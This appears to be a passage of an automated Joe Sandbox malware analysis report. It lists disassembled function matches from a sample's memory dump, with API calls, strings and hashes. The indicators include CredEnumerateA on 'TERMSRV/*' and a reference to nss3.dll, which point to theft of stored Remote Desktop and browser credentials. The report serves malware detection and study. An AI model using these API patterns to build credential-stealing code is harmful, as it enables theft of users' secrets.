                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: TERMSRV/
                                  • API String ID: 1659193697-3001602198
                                  • Opcode ID: f12a918f4ec5fbbaf1f1e226f6410abd7aa50f2c8182b64d2c0a69fb74b5f393
                                  • Instruction ID: 0e33322fa43a7393c9c901e98c28ddf77560ff6a40d7ebd916c261fa5b4e0482
                                  • Opcode Fuzzy Hash: f12a918f4ec5fbbaf1f1e226f6410abd7aa50f2c8182b64d2c0a69fb74b5f393
                                  • Instruction Fuzzy Hash: B011A835410109FFDF026F61CD428DD3E62AF44398F104536B929791F1DB7A8AB1AB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlen.KERNEL32(?,?,?,0040950C,?,?,?,?,?,?,?,?,?,?,?,00409C96), ref: 00409074
                                  • SetCurrentDirectoryA.KERNEL32(?,?,?,?,0040950C,?,?,?,?), ref: 00409095
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectorylstrlen
                                  • String ID: nss3.dll
                                  • API String ID: 2713697268-2492180550
                                  • Opcode ID: 3b585f4db5d425bae0bcfabc25eaeac680e2a13b0d199164af093bfdb9be0e4b
                                  • Instruction ID: 79ef5b793eaa19e43d16629d1b832ed7db9b7e222fb3f2d26c77b95c4dd7ac76
                                  • Opcode Fuzzy Hash: 3b585f4db5d425bae0bcfabc25eaeac680e2a13b0d199164af093bfdb9be0e4b
                                  • Instruction Fuzzy Hash: E811A170602101EFDB106F68EE8E7C93FB1BB84385F01C436E111A92E2E7B9CC918A4D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD19
                                  • CredFree.ADVAPI32(00000000), ref: 0040CD60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Cred$EnumerateFree
                                  • String ID: TERMSRV/*
                                  • API String ID: 3403564193-275249402
                                  • Opcode ID: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                  • Instruction ID: 46919d1b78b4c4f98928751ff711c86717132dd267c8420e9221b8d9fce6a23c
                                  • Opcode Fuzzy Hash: 0dc0858338212ed792853415e734f338c9895230edc29e12f803d11a40f407cf
                                  • Instruction Fuzzy Hash: 91112731804204EBDF319F94C9887DABBB4AF05705F14827BA501721E0C379AF85DB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%